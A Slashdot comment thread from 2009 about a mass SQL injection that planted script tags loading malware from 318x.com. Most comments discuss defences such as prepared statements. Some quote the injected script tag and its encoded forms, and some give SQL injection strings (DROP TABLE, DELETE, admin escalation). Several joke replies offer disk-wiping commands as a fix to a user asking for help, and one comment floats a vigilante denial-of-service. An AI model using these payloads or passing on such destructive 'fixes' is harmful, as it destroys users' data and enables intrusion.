SQL Injection Attack Claims 132,000+

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."

hey

[Spazztastic]

Hey, I went to 318x.com and all of a sudden my computer is acting funny. Any suggestions?

Re:hey

[jo42]

dd if=/dev/zero of=/dev/sda bs=8192 will fix it.

Re:hey

[Yvan256]

Call a comedy club and get your computer on stage?

Re:hey

[unformed]

dd: opening `/dev/sda` failed: Permission denied.

Re:hey

"'dd' is not recognized as an internal or external command, operable program or batch file."

Still broken! =(

Posting AC so I don't get modded to hell by people who either don't think that was funny or are simply incapable of recognizing a joke.

Re:hey

[unformed]

Ok thanks, trying it no

CARRIER DISCONNECT

Re:hey

sudo !!

sudo dd if=/dev/zero of=/dev/sda bs=8192

Nope. Just says "Bad command or file name".

Re:hey

[Runaway1956]

Uhhhhmmmm - does deltree still exist on Windows? It's been a long time since I used it. Somewhere along the line, I called it, and it didn't exist. Windows ME? Windows XP? I don't remember, but it wasn't there. Try rd or rmdir instead. http://en.wikipedia.org/wiki/Deltree

Re:hey

[Pieroxy]

Yes, all that.

Re:hey

[yanyan]

I don't have S(ATA|CSI) you insensitive clod!

Re:hey

[bev_tech_rob]

I am assuming that was a *nix command. The GP probably attempted command from a Windows box, which does not recognize that command and spews forth the quoted error...

Re:hey

[HaeMaker]

The dude clearly doesn't run linux...

This is a system problem...

Delete c:\windows\system32

Re:hey

[Nerdfest]

Then you've already been pwned.

Re:hey

[stfvon007]

on msdos / windows you have to enter:
echo format c: >dd.bat
before entering the dd command. It will work after that. :)

Re:hey

[blair1q]

that's the point

it's not a security issue if you deliberately do something ignorant

like, say, using the internet

THE INTERNET IS NOT SECURE

says so right on the packaging, and always has

Re:hey

[Arancaytar]

I actually post all my comments via a dead-man's-switch proxy that logs my keystrokes in real time and submits the post once it detects inactivity. This way I can type things like Candlejack and still publish my po

Re:hey

[shutdown+-p+now]

That one is outdated. What he needs is "rd /s/q C:\".

Re:hey

[jbezorg]

Maybe he was dictating it.

Re:hey

[secolactico]

You forgot to add the /autotest so it won't ask it for anything.

Re:hey

[element-o.p.]

My Internet didn't come with packaging. I used torrent to get it.

Re:hey

[nneonneo]

I'm not sure what Cygwin does, exactly, but it manages to correctly spew out the first few sectors of my boot drive (including what looks like the MBR) when I do "dd if=/dev/sda", despite the fact that "ls /dev/" shows only fd, stdin, stdout and stderr.

So, with Cygwin installed, I can pwn myself with that command! Hurray!

Re:hey

[Meski]

Yes, Chewbacca.

Little Bobby Tables

[bmearns]

I blame Mrs. Roberts.

Re:Little Bobby Tables

[bmearns]

Digg? Sorry, I'm not really into Pokemon.

318x.com

[NoYob]

I tried to go there and I got this from Google: Diagnostic page for 318x.com

After doing a whois, I see that just about all information is described as "Unknown"

Why is this domain still in existence? Can ICANN take it down?

It looks like the sole reason for this domain is for malware.

Re:318x.com

[NeverVotedBush]

318x.com is now in my hosts file. Can at least try to protect ourselves...

Re:318x.com

[ls671]

318x.com zone is now defined in my DNS so I don't have to update host files on each and every one of my computers.

Just kidding, but host files are so 1980 ;-))

Re:318x.com

[Short+Circuit]

I'm not familiar with any blemishes on ICANN's record of neutrality, but I, for one, wouldn't care to have my blog's domain erased because someone decided it was deemed harmful in some fashion.

Re:318x.com

[BrokenHalo]

I, for one, wouldn't care to have my blog's domain erased because someone decided it was deemed harmful in some fashion.

Sure, but if your domain is well-known to be an attack site, then you should do something about the cause, rather than complaining that no-one wants to visit you any more (just assuming they ever did).

Re:318x.com

[Short+Circuit]

No argument there, but that doesn't mean ICANN should make domain takedown an acceptable policy. Political reasons hold more weight in government than technical ones.

Re:318x.com

[BrokenHalo]

but that doesn't mean ICANN should make domain takedown an acceptable policy.

But it hasn't. A normally configured DNS will still point you to 318x.com if your heart is set upon it, but it is always the right of individuals or groups to just say "No thanks".

Re:318x.com

[Short+Circuit]

Did you read the comment that started this thread? I was addressing the suggestion that ICANN take it down.

Re:318x.com

[BrokenHalo]

My apologies, I think that must have got buried by my viewing settings.

Re:318x.com

[Short+Circuit]

No need to apologize; I'm used to that. Slashdot's comment threshhold system: Giving geeks ADD since 2000. :)

why don't these go away?

[v1]

If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?

Re:why don't these go away?

[qazsedcft]

If it were kiddy porn it would be shutdown already.

Re:why don't these go away?

[jimicus]

You are assuming that all the systems are hosted at reputable hosting companies that pro-actively monitor all their systems.

There are millions of systems worldwide that are exposed to the public internet (even though they probably shouldn't be) that are sitting in the corner somewhere waiting for someone to "get around to decommissioning them" - and in the meantime they're pumping out spam and taking part in DDoS attacks.

Re:why don't these go away?

[DogDude]

"If they know where the site is that's hosting the payload why don't they just shut them down?"

Who is this nebulous "they" you're referring to?

Re:why don't these go away?

[wowbagger]

You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.

Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.

Even the hosting companies that claim to be anti-spam, and who's acceptable use policies state that ANY support of spam, including hosting spamvertized web sites, when confronted with multiple, on-going violations, will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.

Re:why don't these go away?

[BuddaLicious]

They = ICANN, the body legally responsible for yanking the license of a domain name registrar if they don't react quickly to this kind of BS.
SOMEONE has to first complain and ask the DomainName Registrar to revoke the domain name, if they don't comply then SOMEONE has to complain to ICANN.
So first SOMEONE has to change to real living person willing to register the complaint (should fall to the first person who finds themselves infected).

ICANN can be slow, but it has revoke Domain Name Registrar licenses and can do so pretty much at will.

Re:why don't these go away?

[sjames]

The hosting company is irrelevant if the domain's NS records in the gtld-servers are pointed to nowhere. That won't help if the script uses the IP address, but in this case, it would kill it.

Where an IP address is used, null routing by an upstream provider can kill that IP. So the question stands, when the threat is this big, why is the site allowed to continue existing? Start at the colo provider/ISP and work up the chain until a reputable provider is found to null route the IP.

Re:why don't these go away?

[amicusNYCL]

So the question stands, when the threat is this big, why is the site allowed to continue existing?

I don't know if you're bothering to test anything, but from where I stand 318x.com does not exist.

Re:why don't these go away?

[v1]

Because linux sucks ass for games and is counterproductive to most users

and that's sooo important for those hosting web servers whose SQL is being hacked...

Re:why don't these go away?

[Narcocide]

No you're wrong. People attack Windows because the most people use it AND it is conveniently also less inherently secure than anything else in current production. If everyone stopped using Windows and switched to XYZ then XYZ would eventually become the new biggest target, that is true but it is just as completely naive to assume the same percentage of attacks would be successful on an entirely different platform as Windows as it is to assume that you would have a remotely accurate clue about what that new percentage would be unless you were fluent in the use of "XYZ" which I'm assuming you are not because you can't even spell Linux right.

Re:why don't these go away?

[John+Hasler]

And you really want ICANN to "yank" a domain just because somebody who claims to be a security expert says it contains "bad stuff"?

Windoze

[jDeepbeep]

Doesn't say what systems are affected by this SQL Injection.

All I can tell (from TFA), is it affects Windows servers.

Re:Windoze

[TheNinjaroach]

All I can tell (from TFA), is it affects Windows servers.

SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.

Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

Re:Windoze

[jDeepbeep]

Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.

Re:Windoze

True, but the flash exploit is available on anything with flash it looks like (not updated, of course), so the only thing saving Linux/Mac/Sun users is lack of interest on the part of the malware writers.

Re:Windoze

[gregarican]

Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable betwen platforms? I did say "relatively" of course ::rollseyes::

Re:Windoze

[danlip]

What really amazes me is how easy it is to avoid SQL injection attacks. You don't have to be a security genius. Use PreparedStatements in Java (or their equivalent in other languages). Problem solved.

Re:Windoze

[TheLink]

Only easy when using sane languages.

But it used to be very difficult to do the right thing with PHP.

The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.

See: http://php.net/manual/en/function.mysql-real-escape-string.php

Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).

And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_really" ;).

But why didn't they just copy other people and introduce stuff like PDO right at the start?

Re:Windoze

[Runaway1956]

prepared statements. Damn it. I actually read that as "preparation H" the first time.

Now, I'm wondering if preparation H might be the right fix for a Windows machine......

Re:Windoze

[amicusNYCL]

Because of the interface between the server language and the database, not all SQL injection attacks will work on just any setup. The connection between PHP and MySQL, for example, will only execute a single query at a time. SQL Server, for example, will allow you to separate queries with a semicolon and send an entire batch.

Re:Windoze

[Cryophallion]

The only problem is that a number of shared hosts don't allow for pdo with mysql (or postgres). For example, I use FatCow, and they only have PDO enabled for sqlite, which is the php default setting. I've asked them to change this during their quarterly suggestion review, but they have yet to enable it.

And I am loathe to use mysqli's version, as you have to have an output variable for each item, and I am creating dynamic queries for a cms.

So, we are still caught using real escape string....

Re:Windoze

[funaho]

The absolute worst I have encountered is Coldfusion, where you have to do insanely verbose crap like this:

<cfquery name="getId" datasource="somedb">
SELECT id
FROM users
WHERE login = <cfqueryparam value="#login#" type="cf_sql_varchar">
</cfquery>

Re:Windoze

[segedunum]

We don't know that. All we do know is that it needs a Windows client.

Re:Windoze

[TheLink]

If they introduced PDO earlier (and didn't create the aforementioned stupid stuff) you wouldn't have this problem.

As it is, lots of PHP hosting sites will either be prone to SQL injection, or prone to data corruption (or both), and be a pain to people (like you) trying to get things safe and working correctly.

The right way of doing things is: you filter inputs to your program so that your program can cope with the data, THEN your program has different filters for each output from your program to a different destination (database, browser etc) so that those destinations can handle the data correctly.

Unfortunately PHP idioms encourage programmers to combine the filtering (e.g. magic_quotes), which is wrong and doesn't even work (against SQL injection) for some UTF cases.

Re:Windoze

[Cryophallion]

Agreed on all points, and php5's fixed OOP is key to be able to do many of those things (including pdo) correctly.

I'm just frustrated as I want to try using a framework (such as symfony) for my sites instead of having to keep up my own cms all the time, but I can't because I can't use something which should not only be installed, but preferred/recommended by the hosting company.

Re:Windoze

[Arancaytar]

Argh. That is as if XML and SQL had a kid and it was ugly as fuck. :(

Re:Windoze

[ralphdaugherty]

Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable betwen platforms? I did say "relatively" of course ::rollseyes::

      Except when the attack depends on multi-statement lines separated by a : and a specific meta table to get names of tables and fields to insert the injection as with a recent exploit with Windows SQL Server.

An explanation for 500 Thousand MS Web Servers Hacked
http://www.rdwrites.com/forums/viewtopic.php?t=3602

  rd

Re:Windoze

[dkf]

The only problem is that a number of shared hosts don't allow for pdo with mysql (or postgres). For example, I use FatCow, and they only have PDO enabled for sqlite, which is the php default setting. I've asked them to change this during their quarterly suggestion review, but they have yet to enable it.

That sounds to me like it is worth considering relocating your business to another facility that does support PDO with mysql and/or postgres. Why put up with bad service when there's someone else who'll be willing to do things properly so you can avoid the pain points?

correction

[jDeepbeep]

Doesn't say what systems are affected by this SQL Injection.

All I can tell (from TFA), is it affects Windows

Fixed. Need coffee.

Reminds me of xkcd

[BountyX]

Seriously people stop naming your kids with ');DROP TABLE at the end...

Re:Reminds me of xkcd

[Ksevio]

Well that would be an SQL injection attack... Does everything that's been covered by XKCD remind you of it now?

Details?

[HangingChad]

I love the way they fail to mention what server systems might be effected. Is it SQL Server? MySQL? .NET? PHP? Windows servers? Linux? Both? What web sites are vulnerable?

It's always fun to snicker when you get to the registry entries which points to Windows. Although there was a trojan for Ubuntu in a desktop theme a few days ago, so enjoy the time to mock Windows users while it lasts.

Re:Details?

[Yvan256]

But a Trojan needs user access and approval to get installed. No OS on the planet can protect itself from a user with the admin password.

Re:Details?

[Bert64]

Windows 9x used to due a pretty good job, can't own a system once it's bluescreened.

Re:Details?

[ShOOf]

And in the case of SQL injections it's usually not the fault of the underlying database, it's stupid coders who don't validate their inputs.

Re:Details?

[LordKaT]

Even still, this blog post is fucking useless. What CMS? What input is not being validated? Is it an underlying problem with Drupal? Wordpress? Joomla? What version?

On top of that, it doesn't give any recommendations for what end users could do to protect themselves. Does anti-virus software already detect it? Can you simply alter your hosts file? Disable Javascript?

The blog post is completely fucking useless.

Re:Details?

[necrogram]

They didn't mention it because it doesn't matter. Its the result of bad coding practices. A sql injection attack is caused by the front end application accepting whatever input its given and using to generate the sql statements. You stop these attacks by sanitizing your input, use stored procedures to do the database work, and possibly stick in a middle ware tear to handle database access, ie apache -> websphere -> database.

Re:Details?

[Bengie]

paramerterized inputs?

The only times I EVER pass a value as a concatenated string is if it goes along these lines..

try
query = "select [columns] from table where iTableID = "+INT64.Parse(strInput).ToString();
catch

^^
My lazy code. I only do internal utilities on side projects, so I can get away with this since these utilities are seldom used by anyway except when crap goes wrong. My primary job is SQL.

otherwise it's always the

string strSelectQry = "Select [columns] from schooltable where ischoolguid = @ischoolguid";
cmd = new SqlCommand(strSelectQry, cnn);

SqlParameter schoolguild = cmd.Parameters.Add("@ischoolguid", SqlDbType.UniqueIdentifier);
                                                schoolguild.Value = new Guid(strSchoolGUID);

Re:Details?

[BlackSnake112]

Actually windows 9x did not have services, so there was less to hack into.

Re:Details?

[HangingChad]

They didn't mention it because it doesn't matter. Its the result of bad coding practices.

It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. Lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.

Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are effected and whether the operating system OS makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that, surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.

Re:Details?

[lseltzer]

If it's really over 100,000 sites with the same attack then there's something obvious they have in common, like the same PHP/MYSQL library, and it has a predictable vulnerability in it.

Re:Details?

[caluml]

Linux + GRSec (or SELinux) can. Assuming they don't know the password/mechanism to enter the "unlocked" mode. There used to be a Gentoo SELinux box on the net - selinux.dev.gentoo.org, I think it was. They published the root password, and let you log in. It was funny to watch all the skiddies on there, copying their rootkits down. I wish I could have sent a wall to them all - "You're already root - stop that!".

Re:Details?

[CodeBuster]

I'm not in the habit of combing through forum code looking for unvalidated inputs.

That is not the correct way to address SQL injection anyway; there will always be one that you don't check for or a textbox that slipped past your validation routines. No, the proper way to avoid SQL injection is to avoid using string operations to build your query before running it directly against the database (a common practice in cheesy php and old asp tutorials on the web). To avoid falling victim to a SQL injection attack, use either stored procedures OR parameterized statements. SQL injection is trivially simple to avoid provided that one knows about it (all web devs worth their salt should by now) and knows how to code web apps properly to avoid it (again simple).

Re:Details?

[cbiltcliffe]

Its the result of bad coding practices.

Yeah?

Big deal.

So is Windows.

harharharhar
Here all week...try the fish....eh, whatever.

How is SQL involved?

[Bromskloss]

The article said "SQL" in the headline, but never mentioned it again after that.

Re:How is SQL involved?

[jDeepbeep]

The article said "SQL" in the headline, but never mentioned it again after that.

My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.

Re:How is SQL involved?

[Gary+van+der+Merwe]

You are right, that's not SQL Injection attacks, rather a HTML+script injection. A SQL Injection allows you to meddle with the sites database.

Re:How is SQL involved?

[LordKaT]

AFAIK there are two exploits:

On the users end there are several MS and Adobe scripting exploits being taken advantage of, all of which start inside the browser.

On the server end there is a SQL injection exploit being used to get the malicious code out there.

Re:How is SQL involved?

How the hell is this +1 informative? If you comprehended (step 2, after read) the article, you would understand that you have listed the client-side exploits that the payload delivered by the SQL injection. You have not addressed the grandparent, who CLEARLY (as in, in the title AND single line of content) requested more information regarding host profiles that may have been affected by the SQL injection itself.

Re:How is SQL involved?

[Gary+van+der+Merwe]

On the server end there is a SQL injection exploit being used to get the malicious code out there.

My point being that you don't need to do a SQL injection to do this.

To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.

To prevent a HTML+script injection, you need to change < to &lt;, > to &gt; & to &amp; etc. on input from the user that render to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into at comment or some other user field. This has nothing to do with SQL.

Re:How is SQL involved?

[gregarican]

The SQL injection allows the malware scripts to be placed on websites. Then website visitors get hit with the malware the scripts facilitate. Of course, silly me, I went and RTFA. Half of the headlines on /. are either grammatically incorrect, sensationalized, or just plain silly...

Re:How is SQL involved?

[cenc]

folder permissions.

Re:How is SQL involved?

[nigelo]

Mod parent up. The GP is way off the mark.

The real problem

So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
FTA:

Observed exploits include:

        * Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
        * MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
        * Microsoft Office Web Components vulnerabilities described in MS09-043
        * Microsoft video ActiveX vulnerability described in MS09-032
        * Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

Re:The real problem

[wjsteele]

Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.

This is actualy a stupid article, as it doensn't even bother to describe the platform which has the vulnerability in it. It's not a platform or database issue if it's a SQL Injection, so it must be some app that is common... like a CMS package or blog engine... something like that.

Bill

Re:The real problem

[gmuslera]

Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.

In official packages of a linux distribution, i would say that almost all would be patched so shouldn't be affected. But we are talking about Windows world here. Im not sure how automatic are the updates for flash player (just today got one in my ubuntu box), Windows updates are known to add functionality (sometimes unwanted, so people could disable automatic updates after something "misbehaves"), and the MS fixes there probably arent for IE6 (still used by 20% of internet), maybe some for IE7 that is more widely used or older version of Office.

About the article, yes, it seriously lacks showing how the servers got intruded, it went more to the symptoms (in a google search were found to have that exploit link). But is useful to know for the people that claim that they are safe even running windows without latest patches or versions of software could get into trouble visiting normal/regular sites.

Re:The real problem

[MisterZimbu]

This is actualy a stupid article, as it doensn't even bother to describe the platform which has the vulnerability in it. It's not a platform or database issue if it's a SQL Injection, so it must be some app that is common... like a CMS package or blog engine... something like that.

It doesn't matter. It's not an attack on a specific web server, CMS, or even database engine. The ONLY thing that matters is if the underlying scripts driving the website are poorly written and vulnerable themselves.

It's not difficult to write something that spiders websites and attempts injection attacks against querystring variables that that individual site commonly uses. The exact same thing happened either late last year or early this year. Now in that instance, that was specifically targeted for MS Sql Server, but it's not hard to imagine a completely platform-independent version.

Re:The real problem

[ToasterMonkey]

So the SQL injection which landed those vulnerabilities on 100+ thousand formerly trusted sites is not a real problem?

Re:The real problem

[element-o.p.]

Which, of course, have already been addressed by the respective companies. Only unpatched systems would be affected.

Are you certain? I believe Flash might still have issues, unless Adobe has figured out something to contradict their earlier statement that "...unfortunately, there is no easy solution. This issue is very difficult to solve without also breaking existing, legitimate content elsewhere on the web." Still, that report was a month ago, so maybe the situation has changed since then. I couldn't find anything to confirm or deny that current versions of Flash are still vulnerable -- does anyone else know?

Obvious, but needs to be said

[GreenTom]

Add to windows\system32\drivers\etc\hosts:

127.0.0.1 318x.com

And you should be safe, for the moment.

Re:Obvious, but needs to be said

[AA+Wulf]

Good plan, except some services need that loopback address. Wikipedia says use 0.0.0.0

Re:Obvious, but needs to be said

[Nohea]

safe until next week, when they use another address.

Checking inputs is the only fix.

No...

[Oxford_Comma_Lover]

The assumption is that once there are a hundred thousand servers hit, and maybe fewer, if the hosting company doesn't shut down the site within an hour or two a responsible upstream router blocks traffic from the site. Every delivered payload costs society more time and money.

Re:No...

[jimicus]

I think the sheer amount of shite in the form of worms, spam and DoS attacks continuing to flood the Internet kind of kills off that utopian vision, wouldn't you say?

Re:No...

[sjames]

Obviously, the suggestion is not implemented at all now.

Re:Use MongoDB instead

[asdf7890]

I wouldn't be happy with the in-place updates and lazy writing (http://blog.mongodb.org/post/248614779/fast-updates-with-mongodb-update-in-place) for anything of noticeable importance. Though for some tasks I'm sure the performance boost is worth the potential corruption suseptability this implies.

Let's say it all together now...

[gregarican]

validate your SQL inputs before posting them against an Internet-facing database. This isn't an SQL problem. This isn't a Windows-based problem. This is a poor coders problem. If there are high-profile websites that were compromised I'd be one pissed off PHB fo sho...

Re:Let's say it all together now...

[Vellmont]

validate your SQL inputs before posting them against an Internet-facing database.

Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone elses userID), but that's a different class of vulnerability.

Re:Let's say it all together now...

[DNX+Blandy]

Lame coders who either 1) Just don't understand, so are fucking stupid! 2) Just don't care, so are fucking stupid! Note: I'm a coder, but I've always taken security very seriously, hence I get emails everytime someone trys :) and the sites I manage are OK.

Re:Let's say it all together now...

[MobyDisk]

validate your SQL input

It's worse than that. Most code actually doesn't have to do validate SQL inputs because the database API does it for you. For example:

PERL:
$dbh->prepare('SELECT * FROM customers WHERE name = ?')
$dbh->execute($lastname)

VB/C#/etc.
SqlCommand dbc = new SqlCommand();
dbc.Command = "SELECT * FROM customers WHERE name = @name";
dbc.Parameters["@name"].CustomerName = ");' DROP TABLE customers";
dbc.Execute();

The above code will not result in a SQL injection. It will work fine. The developer doesn't have to do anything special. The only time this is a problem is when developers go directly to the database, and bypass the layer that protects them.

Re:Obligatory NoScript comment

[maxume]

The article says that the exploit uses multiple layers of scripts hosted on several different sites...

Let's see

[zefciu]

Hmmm...;)UPDATE users SET isAdmin='1' WHERE users.login='zefciu';

Re:Oblig

[Monkeedude1212]

Exactly!

Obligatory

Looks like IIS

[tom1974]

Hit Google, you'll get things like this

Looks like Windows IIS + MSSQL again.

Re:AV Detection

[REggert]

according to TFA:

Malware description

Threatname: Backdoor.Win32.Buzus.croo

Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.

Don't worry, that site is slashdotted.

[neo]

It's already under a huge DOS attack by the readers of Slashdot. There's no need to block it, in fact you should be attempting to load that page in concert with all the other members of the Slashbot.

Re:Don't worry, that site is slashdotted.

[GreenTom]

Ya know, I always wondered why the Spam Vigilante concept never caught on--using the power of Slashdotting for good! If everyone who's running something@home was also willing to open just 1 connection/seccond to a community selected "site of the day," I bet we'd be able to shut down a lot of malware/spam sites.

It could even be automatic--just have some background task that every second opens up a connection to a random link choosen from your spam folder. If everyone did it...

Re:AV Detection

[LordSnooty]

to repeat comments I made months ago... why don't these people agree on a common naming convention for new threats? 11 different names here!

Lame coders who don't care about security!

[DNX+Blandy]

Lame, or just to stupid to understand! OK, I'm a coder but I take security very seriously. Why are sites still prone to this type of attack? I used to work with Classic ASP scripts, (I use .NET now obviously), which were very prone to SQL injection attacks but I had no problems, mainly because on all pages, I simply check the query string for the following: char( cast( convert( If it contained any of these, add IP to bad list and redirect to /banned.htm page. SIMPLE!!

Re:Lame coders who don't care about security!

[mrt_2394871]

... I simply check the query string for the following:

char(
cast(
convert(

If it contained any of these, add IP to bad list and redirect to /banned.htm page.

SIMPLE!!

Simple, and wrong. Do not enumerate badness when filtering.

Whatever interface you are using to whatever SQL database, there should be an "escape" function that lets you store strings containing string delimiters.

Find that function. Use that function.

Re:Lame coders who don't care about security!

[DNX+Blandy]

Very true, at which point this function simply doubled up the string delimiters, breaking the SQL injection. The major problem with Classic ASP was the casting of variables, if not done properly you were asking for it. If it's numeric, check it. .NET does not suffer from this problem unless the coder specifically passes a numeric value thou to an SQL statement as a string, which would be stupid. If everyone used stored procedures to deal with the SQL data, none of this would happen. My above checks alert you to the fact that someone if having a go, you can't do that when checking for string delimiters as they are valid characters, but yes, if your code uses a shitty "execute" command, check it. If you use proper stored procedures, this will no affect you.

Re:Lame coders who don't care about security!

[V+for+Vendetta]

I used to work with Classic ASP scripts,[...] which were very prone to SQL injection attacks

I don't think so. It's a matter of using available ADO objects/methods. ASP Classic:

Dim sSQL, sLastName, cmd, prm, rs

sLastName = Request.Form("txtLastName")

sSQL = "SELECT * FROM Customer WHERE LastName = ?;"

Set cmd = Server.CreateObject("ADODB.Command")
cmd.ActiveConnection = cn
cmd.CommandType = adCmdText
cmd.CommandText = sSQL
cmd.Prepared = True

Set prm = cmd.CreateParameter("LastName", adBSTR, adParamInput, Len(sLastName), sLastName)
cmd.Parameters.Append prm

Set rs = cmd.Execute()

Re:Lame coders who don't care about security!

[shutdown+-p+now]

You don't need stored procedures, all you need are parametrized statements/commands, so long as your API provides it. And plain ADO, which was used with classic ASP, did provide parametrized commands.

Any attempt to defeat SQL injection by blacklisting syntax is inherently error-prone if only because it may break on a future version of database (when its syntax gets extended). Not to mention that, unless you have perfect knowledge of 100% of the SQL dialect that your implementation uses, you may forget to blacklist some corner case.

In short, if you use text substitution to counter SQL injection, you're not doing it right.

Re:Lame coders who don't care about security!

[DNX+Blandy]

Exactly!! It's depends on the methods used. You'll be amazed how many people just shove the code in and don't check. I've seen lots of code from companies that would execute the above like: Dim sSQL, sLastName, cmd sLastName = Request.Form("txtLastName") sSQL = "SELECT * FROM Customer WHERE LastName = " + sLastName + ";" Set cmd = Server.CreateObject("ADODB.Command") cmd.ActiveConnection = cn Set rs = cmd.Execute(sSQL) cmd.Close Set cmd = Nothing --------- Lets say sLastName = '; DELETE FROM [Customer] Oops!! There goes the [Customer] table. To find the table name in the first place you can inject sql queries like this as much as you like.

Re:Lame coders who don't care about security!

[DNX+Blandy]

Totally agree, it's a pitty out of the 132,000 hacked sites that are written in Classic ASP that the coders havent done this :) It totally depends on the methods used in the code and, unfortuntly, there is A LOT of bad ass coding about :( Example: http://www.w3schools.com/ADO/ado_update.asp Checkout the second window, "UPDATE customers SET...", oh dear!! BAD coding and w3schools is well recognized! I bet a lot of coders have fallin into this HUGE hole.

Terrible article, inappropriate headline

[erroneus]

The source of the attacks are servers who have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.

What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe flash is only a a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story which is about compromised SERVERS, not about compromised clients.

132,000 hits on Google 132,000 infections

[shdragon]

I must disagree with the way they calculated infections. Counting the number of times something comes up on Google does not equal the number of infections.

132,000? Try 1269.

[milesw]

As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:

http://google.com/safebrowsing/diagnostic?site=318x.com/

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxagri.gov.cn/, glojj.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1269 domain(s), including 37y.org/, cec.org.cn/, jxagri.gov.cn/.

Re:132,000 hits on Google 132,000 infections

[amicusNYCL]

If they search for the right string, then it should very closely approximate the number of compromised websites. The only other thing it should find are people talking about how to find the list of compromised websites.

Probably the Asprox botnet.

[lastchance_000]

I googled 318x.com and SQL injection and found this. A little further searching revealed that Asprox has been ramping up activity recently.

Re:Probably the Asprox botnet.

[jbezorg]

I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The ocassional coldfusion page also has me wondering.

From the first page of a google search for "<script src=http://318x.com></script>":

City of Iowa City<script src=http://318x.com></script> - How to ...
Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'. /default/templates/top2.asp, line 60.
www.icgov.org/default/?id=1787

www.icgov.org:80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 10 Dec 2009 20:29:42 GMT
Connection: close
Content-Length: 4009
Content-Type: text/html

YEMEN TIMES : Education
Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script> ...
www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached

IWCS - Learning<script src=http://318%78.com></script><script src ...
Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script ...
www.iwcs.com/category.cfm?Category=2932

SQL injections? Are those for H1N1?

[fortapocalypse]

Oops. Send those SQL injections back. We don't need them.

Re:AV Detection

[sexconker]

Because they're all a different set of idiots who want to sell you their different products that don't actually work.

Their business model is FUD.

Re:ColdFusion dynamic SQL interface

[butlerm]

Unless you have a driver that is seriously deficient, you can leave out the cfsqltype="cf_sql_varchar" part.

Many dynamic SQL interfaces are at least as verbose, due to the requirement to bind all the parameters. And good luck if you have to count question marks to get your parameter bindings in the right order, as in PHP, ODBC, JDBC etc.

